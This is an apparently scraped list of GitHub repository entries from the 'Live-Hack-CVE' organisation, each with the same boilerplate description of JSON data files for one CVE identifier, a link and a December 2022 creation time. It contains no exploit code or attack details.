**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3585](https://github.com/Live-Hack-CVE/CVE-2021-3585) create time: 2022-12-26T04:04:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3414](https://github.com/Live-Hack-CVE/CVE-2021-3414) create time: 2022-12-26T04:04:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20260](https://github.com/Live-Hack-CVE/CVE-2021-20260) create time: 2022-12-26T04:04:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41784 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41784](https://github.com/Live-Hack-CVE/CVE-2021-41784) create time: 2022-12-26T03:27:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41783](https://github.com/Live-Hack-CVE/CVE-2021-41783) create time: 2022-12-26T03:26:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41785](https://github.com/Live-Hack-CVE/CVE-2021-41785) create time: 2022-12-26T03:26:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41780 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41780](https://github.com/Live-Hack-CVE/CVE-2021-41780) create time: 2022-12-26T03:26:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3914](https://github.com/Live-Hack-CVE/CVE-2021-3914) create time: 2022-12-26T03:26:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41781](https://github.com/Live-Hack-CVE/CVE-2021-41781) create time: 2022-12-26T03:26:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41782](https://github.com/Live-Hack-CVE/CVE-2021-41782) create time: 2022-12-26T03:26:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3020](https://github.com/Live-Hack-CVE/CVE-2021-3020) create time: 2022-12-26T03:26:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40326](https://github.com/Live-Hack-CVE/CVE-2021-40326) create time: 2022-12-26T03:26:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38714](https://github.com/Live-Hack-CVE/CVE-2021-38714) create time: 2022-12-26T03:24:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36277](https://github.com/Live-Hack-CVE/CVE-2021-36277) create time: 2022-12-26T03:20:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38149](https://github.com/Live-Hack-CVE/CVE-2022-38149) create time: 2022-12-26T04:09:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1142](https://github.com/Live-Hack-CVE/CVE-2022-1142) create time: 2022-12-26T04:09:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1141](https://github.com/Live-Hack-CVE/CVE-2022-1141) create time: 2022-12-26T04:09:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1145 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1145](https://github.com/Live-Hack-CVE/CVE-2022-1145) create time: 2022-12-26T04:09:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1143](https://github.com/Live-Hack-CVE/CVE-2022-1143) create time: 2022-12-26T04:09:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1144](https://github.com/Live-Hack-CVE/CVE-2022-1144) create time: 2022-12-26T04:09:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36706](https://github.com/Live-Hack-CVE/CVE-2022-36706) create time: 2022-12-26T04:08:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1146 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1146](https://github.com/Live-Hack-CVE/CVE-2022-1146) create time: 2022-12-26T04:08:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1232](https://github.com/Live-Hack-CVE/CVE-2022-1232) create time: 2022-12-26T04:08:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1487](https://github.com/Live-Hack-CVE/CVE-2022-1487) create time: 2022-12-26T04:08:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36708 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36708](https://github.com/Live-Hack-CVE/CVE-2022-36708) create time: 2022-12-26T04:08:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36573](https://github.com/Live-Hack-CVE/CVE-2022-36573) create time: 2022-12-26T04:08:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1488](https://github.com/Live-Hack-CVE/CVE-2022-1488) create time: 2022-12-26T04:08:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36705](https://github.com/Live-Hack-CVE/CVE-2022-36705) create time: 2022-12-26T04:08:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36704](https://github.com/Live-Hack-CVE/CVE-2022-36704) create time: 2022-12-26T04:08:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1490](https://github.com/Live-Hack-CVE/CVE-2022-1490) create time: 2022-12-26T04:07:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1492](https://github.com/Live-Hack-CVE/CVE-2022-1492) create time: 2022-12-26T04:07:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1491](https://github.com/Live-Hack-CVE/CVE-2022-1491) create time: 2022-12-26T04:07:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1489 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1489](https://github.com/Live-Hack-CVE/CVE-2022-1489) create time: 2022-12-26T04:07:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1494](https://github.com/Live-Hack-CVE/CVE-2022-1494) create time: 2022-12-26T04:07:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2997](https://github.com/Live-Hack-CVE/CVE-2022-2997) create time: 2022-12-26T04:07:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2287](https://github.com/Live-Hack-CVE/CVE-2022-2287) create time: 2022-12-26T04:07:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2288](https://github.com/Live-Hack-CVE/CVE-2022-2288) create time: 2022-12-26T04:07:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2183](https://github.com/Live-Hack-CVE/CVE-2022-2183) create time: 2022-12-26T04:07:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2264](https://github.com/Live-Hack-CVE/CVE-2022-2264) create time: 2022-12-26T04:07:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23947](https://github.com/Live-Hack-CVE/CVE-2022-23947) create time: 2022-12-26T04:07:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23804](https://github.com/Live-Hack-CVE/CVE-2022-23804) create time: 2022-12-26T04:07:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23803](https://github.com/Live-Hack-CVE/CVE-2022-23803) create time: 2022-12-26T04:06:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0393](https://github.com/Live-Hack-CVE/CVE-2022-0393) create time: 2022-12-26T04:06:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1493](https://github.com/Live-Hack-CVE/CVE-2022-1493) create time: 2022-12-26T04:06:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17570 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17570](https://github.com/Live-Hack-CVE/CVE-2019-17570) create time: 2022-12-26T02:45:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6832 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6832](https://github.com/Live-Hack-CVE/CVE-2019-6832) create time: 2022-12-26T02:44:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6825](https://github.com/Live-Hack-CVE/CVE-2019-6825) create time: 2022-12-26T02:44:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6814](https://github.com/Live-Hack-CVE/CVE-2019-6814) create time: 2022-12-26T02:44:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6831 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6831](https://github.com/Live-Hack-CVE/CVE-2019-6831) create time: 2022-12-26T02:44:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7547 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7547](https://github.com/Live-Hack-CVE/CVE-2020-7547) create time: 2022-12-26T02:44:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7573](https://github.com/Live-Hack-CVE/CVE-2020-7573) create time: 2022-12-26T02:44:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7545](https://github.com/Live-Hack-CVE/CVE-2020-7545) create time: 2022-12-26T02:44:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7530](https://github.com/Live-Hack-CVE/CVE-2020-7530) create time: 2022-12-26T02:44:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7248 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7248](https://github.com/Live-Hack-CVE/CVE-2020-7248) create time: 2022-12-26T02:43:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26140](https://github.com/Live-Hack-CVE/CVE-2020-26140) create time: 2022-12-26T02:43:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5135](https://github.com/Live-Hack-CVE/CVE-2020-5135) create time: 2022-12-26T02:42:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9883 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9883](https://github.com/Live-Hack-CVE/CVE-2020-9883) create time: 2022-12-26T02:42:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29659 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29659](https://github.com/Live-Hack-CVE/CVE-2020-29659) create time: 2022-12-26T02:42:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27792](https://github.com/Live-Hack-CVE/CVE-2020-27792) create time: 2022-12-26T02:42:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28445 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28445](https://github.com/Live-Hack-CVE/CVE-2020-28445) create time: 2022-12-26T02:42:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25723 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25723](https://github.com/Live-Hack-CVE/CVE-2020-25723) create time: 2022-12-26T02:40:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28916 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28916](https://github.com/Live-Hack-CVE/CVE-2020-28916) create time: 2022-12-26T02:40:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27821](https://github.com/Live-Hack-CVE/CVE-2020-27821) create time: 2022-12-26T02:40:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29443 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29443](https://github.com/Live-Hack-CVE/CVE-2020-29443) create time: 2022-12-26T02:39:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20203](https://github.com/Live-Hack-CVE/CVE-2021-20203) create time: 2022-12-26T02:39:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38934](https://github.com/Live-Hack-CVE/CVE-2021-38934) create time: 2022-12-26T03:20:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29864](https://github.com/Live-Hack-CVE/CVE-2021-29864) create time: 2022-12-26T03:19:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21870](https://github.com/Live-Hack-CVE/CVE-2021-21870) create time: 2022-12-26T02:46:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21893](https://github.com/Live-Hack-CVE/CVE-2021-21893) create time: 2022-12-26T02:46:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21865](https://github.com/Live-Hack-CVE/CVE-2021-21865) create time: 2022-12-26T02:46:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40418](https://github.com/Live-Hack-CVE/CVE-2021-40418) create time: 2022-12-26T02:46:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42392 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42392](https://github.com/Live-Hack-CVE/CVE-2021-42392) create time: 2022-12-26T02:46:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39927 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39927](https://github.com/Live-Hack-CVE/CVE-2021-39927) create time: 2022-12-26T02:46:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40406](https://github.com/Live-Hack-CVE/CVE-2021-40406) create time: 2022-12-26T02:46:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40417 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40417](https://github.com/Live-Hack-CVE/CVE-2021-40417) create time: 2022-12-26T02:46:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21955 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21955](https://github.com/Live-Hack-CVE/CVE-2021-21955) create time: 2022-12-26T02:46:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42717](https://github.com/Live-Hack-CVE/CVE-2021-42717) create time: 2022-12-26T02:45:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4133 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4133](https://github.com/Live-Hack-CVE/CVE-2021-4133) create time: 2022-12-26T02:45:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21860](https://github.com/Live-Hack-CVE/CVE-2021-21860) create time: 2022-12-26T02:45:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21859](https://github.com/Live-Hack-CVE/CVE-2021-21859) create time: 2022-12-26T02:45:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42372 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42372](https://github.com/Live-Hack-CVE/CVE-2021-42372) create time: 2022-12-26T02:45:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42371 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42371](https://github.com/Live-Hack-CVE/CVE-2021-42371) create time: 2022-12-26T02:45:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3156 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3156](https://github.com/Live-Hack-CVE/CVE-2021-3156) create time: 2022-12-26T02:44:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27807](https://github.com/Live-Hack-CVE/CVE-2021-27807) create time: 2022-12-26T02:44:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27906](https://github.com/Live-Hack-CVE/CVE-2021-27906) create time: 2022-12-26T02:44:51Z

